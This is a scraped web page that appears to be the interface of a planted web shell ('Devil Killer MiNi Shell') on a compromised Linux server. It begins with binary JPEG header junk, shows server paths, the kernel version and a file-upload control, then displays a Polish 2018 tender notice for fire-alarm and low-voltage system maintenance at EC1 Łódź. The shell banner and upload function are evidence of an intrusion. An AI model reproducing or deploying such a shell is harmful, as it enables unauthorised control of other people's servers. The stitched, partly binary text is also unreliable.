JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20180706/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20180706/584440-N-2018.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 584440-N-2018 z dnia 2018-07-06 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">"EC1 Łódź-Miasto Kultury" w Łodzi</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">PRZEGLĄD INSTALACJI NISKOPRĄDOWYCH, KONSERWACJA SYSTEMU SYGNALIZACJI POŻAROWEJ WRAZ Z USUWANIEM AWARII W BUDYNKACH: EC1 ZACHÓD, EC1 WSCHÓD I DYREKCJI KOMPLEKSU ,,EC1 ŁÓDŹ - MIASTO KULTURY" W ŁODZI</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Usługi</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej - mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">"EC1 Łódź-Miasto Kultury" w Łodzi</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">10052223800000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">ul. Targowa</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">1/3</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">90-022 </span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Łódź</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">łódzkie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">42 233 50 53</span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">zamowienia@ec1lodz.pl</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">42 638 59 58</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">www.bip.ec1lodz.pl</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Inny (proszę określić):</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny">Instytucja Kultury</span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia"></span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">www.bip.ec1lodz.pl</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">pisemnie </span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">"EC1 Łódź - Miasto Kultury" w Łodzi, ul. Targowa 1/3, 90-022 Łódź, Sekretariat</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">PRZEGLĄD INSTALACJI NISKOPRĄDOWYCH, KONSERWACJA SYSTEMU SYGNALIZACJI POŻAROWEJ WRAZ Z USUWANIEM AWARII W BUDYNKACH: EC1 ZACHÓD, EC1 WSCHÓD I DYREKCJI KOMPLEKSU ,,EC1 ŁÓDŹ - MIASTO KULTURY" W ŁODZI</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">121/DTOK/PN/2018</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Usługi</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Tak</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski">wszystkich części</span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy"></span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">Przedmiotem zamówienia są:Usługi przeglądów instalacji niskoprądowych, konserwacji systemu sygnalizacji pożarowej wraz z usuwaniem awarii w budynkach:- EC1 WSCHÓD i DYREKCJI,- EC1 ZACHÓDkompleksu ,,EC1 ŁÓDŹ - MIASTO KULTURY" w Łodzi.Zamawiający dopuszcza składanie ofert częściowych w podziale na wymienione niżej dwa zadania (zadanie A i zadanie B). Wykonawca może złożyć ofertę na jedno lub dwa zadania.Każde z zadań obejmuje zakres podstawowy (przeglądy i konserwacje) oraz zakres dodatkowy (naprawy i usuwanie awarii).ZADANIE A Przedmiotem zamówienia jest usługa polegająca na zapewnieniu przez Wykonawcę stałej sprawności technicznej instalacji niskoprądowych i jej systemów opisanych w przedmiocie zamówienia obejmująca:Zakres podstawowy - obowiązkowy jednorazowy przegląd okresowy i wykonanie konserwacji systemów instalacji niskoprądowych opisanych w niniejszym opisie przedmiotu zamówienia. Zakres dodatkowy - sukcesywne usuwanie awarii i dokonywanie napraw w okresie obowiązywania umowy instalacji niskoprądowych na zlecenie Zamawiającego w kompleksie budynków ,,EC1 Łódź Miasto Kultury" w Łodzi przy ul. Targowej 1/3 obejmująca budynki EC1 Wschód i budynek Dyrekcji.Zamawiający przewiduje, w ramach zakresu dodatkowego (usuwanie awarii, naprawy), zlecenie maksymalnie 75 roboczo - godzin pracy w okresie trwania Umowy.Instalacje i systemy objęte zadaniem:SSP - System Sygnalizacji Pożarowej służący do wykrywania zagrożenia pożarowego, sygnalizowaniu i powiadamianiu o zagrożeniu oraz wykonywaniu funkcji sterujących realizowane przez moduły funkcyjne inicjujące elementy (pożarowe klapy odcinające, trzymacze drzwi, urządzenia sygnalizacyjne, ostrzegawcze, itp.), i systemy współdziałające (System Kontroli Dostępu, Dźwiękowy System Ostrzegania, Samodzielne Urządzenia Gaśnicze, Centrale Systemu Oddymiania, Centrale Systemu Napowietrzania, Dźwigi, Bramy i Kurtyny dymowe itp.).SNP - systemy niskoprądowe, obejmujące systemy sygnalizacji włamania i napadu, kontrolę dostępu, telewizję przemysłową, domofony, systemy telewizji kablowej, BMS -zarządzanie budynkiem.CSP - Centrala Systemu Pożarowego.SOD - System Oddymiania.DSO - Dźwiękowy System Ostrzegania.SSWiN - System Sygnalizacji Włamania i Napadu.SKD - System Kontroli Dostępu.CCTV - Closed Circuit Television (System monitoringu oparty o kamery analogowe).BMS - Building Management System (System Zarządzania Budynkiem).BMS SERWISOWY Building Management System wraz infrastrukturą (urządzeniami INPUT/OUTPUT komunikacyjnymi) służącą do odczytywania sygnałów alarmowychi sterowania urządzeniami (klimatyzacja, wentylacja).IPTV - Internet Protocol Television (System monitoringu oparty o kamery cyfrowe).DOM - instalacja domofonowaZADANIE BPrzedmiotem zamówienia jest usługa polegająca na zapewnieniu przez Wykonawcę stałej sprawności technicznej instalacji niskoprądowych i jej systemów opisanych w przedmiocie zamówienia poprzez:Zakres podstawowy - obowiązkowy jednorazowy przegląd okresowy i wykonanie konserwacji systemów instalacji niskoprądowych opisanych w niniejszym opisie przedmiotu zamówienia. Zakres dodatkowy - sukcesywne usuwanie awarii i dokonywanie napraw w okresie obowiązywania umowy instalacji niskoprądowych na zlecenie Zamawiającego w kompleksie budynków ,,EC1 Łódź Miasto Kultury" w Łodzi przy ul. Targowej 1/3 obejmująca budynki EC1 Zachód. Zamawiający przewiduje, w ramach zakresu dodatkowego (usuwanie awarii, naprawy), zlecenie maksymalnie 75 roboczo - godzin pracy w okresie trwania Umowy.Instalacje i systemy objęte zadaniem:SSP - System Sygnalizacji Pożarowej służący do wykrywania zagrożenia pożarowego, sygnalizowaniu i powiadamianiu o zagrożeniu oraz wykonywaniu funkcji sterujących realizowane przez moduły funkcyjne inicjujące elementy (pożarowe klapy odcinające, trzymacze drzwi, urządzenia sygnalizacyjne, ostrzegawcze itp.), i systemy współdziałające (System Kontroli Dostępu, Dźwiękowy System Ostrzegania, Samodzielne Urządzenia Gaśnicze, Centrale Systemu Oddymiania, Centrale Systemu Napowietrzania, Dźwigi, Bramy i Kurtyny dymowe, itp.).SNP - systemy niskoprądowe, obejmujące systemy sygnalizacji włamania i napadu, kontrolę dostępu, telewizję przemysłową, domofony, systemy telewizji kablowej, BMS -zarządzanie budynkiem.CSP - Centrala Systemu Pożarowego.SOD - System Oddymiania.DSO - Dźwiękowy System Ostrzegania.SSWiN - System Sygnalizacji Włamania i Napadu.SKD - System Kontroli Dostępu.DOM - instalacja domofonowaBMS - Building Management System (System Zarządzania Budynkiem).BMS SERWISOWY Building Management System wraz infrastrukturą (urządzeniami INPUT/OUTPUT komunikacyjnymi) służącą do odczytywania sygnałów alarmowych i sterowania urządzeniami (klimatyzacja, wentylacja).IPTV - Internet Protocol Television (System monitoringu oparty o kamery cyfrowe).PRZY - Instalacja przyzywowa.Szczegółowy Opis Przedmiotu Zamówienia, zwany dalej SOPZ, dla każdego z zadań, w tym częstotliwość wykonywania przeglądów i konserwacji zostały określone w Załącznikach:- A (ZADANIE A) oraz - B (ZADANIE B) do SIWZ.SOPZ zawiera ponadto niżej wymienione Załączniki, opisujące dodatkowo sposób realizacji zamówienia.ZADANIE AZałącznik	Nazwa Załącznika 1A	Lista obowiązkowych czynności przeglądów i konserwacji2A	Lista instalacji i wymaganych dla nich dodatkowych dokumentów upoważniających do wykonywania przeglądów i konserwacji 3A	Protokół odbioru przeglądu okresowego i konserwacji4A	Protokół zgłoszenia awarii i odbioruZADANIE BZałącznik	Nazwa Załącznika 1B	Lista obowiązkowych czynności przeglądów i konserwacji2B	Lista instalacji i wymaganych dla nich dodatkowych dokumentów upoważniających do wykonywania przeglądów i konserwacji 3B	Protokół odbioru przeglądu okresowego i konserwacji4B	Protokół zgłoszenia awarii i odbioruDOKUMENTY POGLĄDOWEDodatkowo, Zamawiający udostępnia poglądowo dokumentację związaną z realizacją przedmiotu zamówienia, w tym między innymi rozmieszczenia i schematy instalacji poszczególnych systemów oraz instrukcje ich użytkowania:https://betelgeza.ec1lodz.pl/index.php/s/3KqaGA3pVr1QgnTPOLISA O ODPOWIEDZIALNOSCI CYWILNEJWykonawca zobowiązany będzie posiadać przez cały okres realizacji Umowy ubezpieczenie od odpowiedzialności cywilnej z tytułu prowadzonej działalności gospodarczej z sumą ubezpieczenia min. na sumę ubezpieczenia w kwocie min. 500.000,00 złotych (słownie: pięćset tysięcy złotych 00/100) - dla każdego z zadań, a w przypadku złożenia oferty na obydwa zadania - w wysokości min. 1.000.000,00 zł (słownie: jeden milion złotych).ISTOTNE POSTANOWIENIA UMOWYSposób realizacji zamówienia dla obu zadań określają Istotne postanowienia umowy, stanowiące Załącznik nr 2 do SIWZ. Istotne postanowienia umowy nie podlegają negocjacjom.RÓWNOWAŻNOŚĆZamawiający zastrzega, że wszędzie tam gdzie w treści dokumentacji, o której mowa w SIWZ, stanowiącej SOPZ, zostały wskazane znaki towarowe, patenty lub pochodzenie, źródła lub szczegółowe procesy, które charakteryzują produkty lub usługi dostarczane przez konkretnego Wykonawcę, normy, europejskie oceny techniczne, aprobaty, specyfikacje techniczne i systemy referencji technicznych - Zamawiający dopuszcza metody, materiały, urządzenia, systemy, technologie, normy, specyfikacje itp. równoważne do przedstawionych w SOPZ. Dopuszcza się, więc zaproponowanie w ofercie wszelkich równoważnych odpowiedników rynkowych o właściwościach nie gorszych, niż wskazane przez Zamawiającego. Parametry wskazanego standardu określają minimalne warunki techniczne, eksploatacyjne, użytkowe, jakościowe i funkcjonalne, jakie ma spełniać przedmiot zamówienia. Wskazane znaki towarowe, patenty, marki lub nazwy producenta czy źródła lub szczególne procesy, normy, europejskie oceny techniczne, aprobaty, specyfikacje techniczne i systemy referencji technicznych wskazujące na pochodzenie, określają jedynie metody, klasę produktów, materiałów, urządzeń, systemów, technologii, norm, europejskich ocen technicznych, aprobat, specyfikacji technicznych i systemów referencji technicznych itp. W ofercie można przyjąć metody, materiały, urządzenia, systemy, technologie, itp. innych marek i producentów, jednak o parametrach technicznych, jakościowych i właściwościach użytkowych oraz funkcjonalnych odpowiadających metodom, materiałom, urządzeniom, systemom, technologiom, normom, europejskim ocenom technicznym, aprobatom, specyfikacjom technicznym i systemom referencji technicznych itp. opisanym w SIWZ. GWARANCJAZamawiający wymaga dla poszczególnych zadań udzielenia gwarancji w podanym niżej okresie:ZADANIE A	minimum 12 miesięcy ZADANIE B	minimum 12 miesięcy Wykonawca udziela Zamawiającemu gwarancji (jednak nie krótszej niż 12 miesięcy) na całość napraw zgodnie z Istotnymi Postanowieniami Umowy - §11a, na dostarczone i zamontowane urządzenia, części i materiały w systemach i instalacjach niskoprądowych oraz gwarancji na czas trwania umowy na wszelkie wykonane prace będących przedmiotem zamówienia. Termin gwarancji biegnie od daty podpisania protokołu odbioru. Okres rękojmi za wady jest równy okresowi gwarancji. Zamawiający informuje, że okres udzielanej gwarancji jest jednym z kryteriów oceny oferty. Opis kryteriów oceny ofert zawarty jest w Rozdziale XIV niniejszej SIWZ.WIZJA LOKALNA:1)	W celu prawidłowego przygotowania oferty oraz oszacowania kosztów realizacji usługi zaleca się dokonanie wizji lokalnej.2)	Koszt wizji lokalnej ponosi Wykonawca. 3)	Prowadzenie jakichkolwiek ustaleń podczas wizji nie jest wiążące. Wszelkie merytoryczne pytania należy kierować do Zamawiającego pisemnie lub e-mailem, zgodnie z postanowieniami niniejszej SIWZ.4)	Wizja lokalna będzie mogła mieć miejsce w dni robocze - w godzinach 8:00 - 16:00 5)	O dokonanie wizji lokalnej należy zwracać się z wnioskiem, przesłanym e-mailem do Zamawiającego na adres:e-mail: a.sikorski@ec1lodz.pl, do wiadomości: zamowienia@ec1lodz.pl. We wniosku należy wskazać Wykonawcę oraz ilość osób, która będzie uczestniczyła w wizji.6)	Zamawiający wyznaczy termin wizji lokalnej informując Wykonawcę o powyższym w drodze e-mailowej.7)	W przypadku pytań zgłaszanych w trakcie wizji, Wykonawca po jej zakończeniu winien przesłać je na adres e-mail: zamowienia@ec1lodz.pl</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">50710000-5</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów - szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span 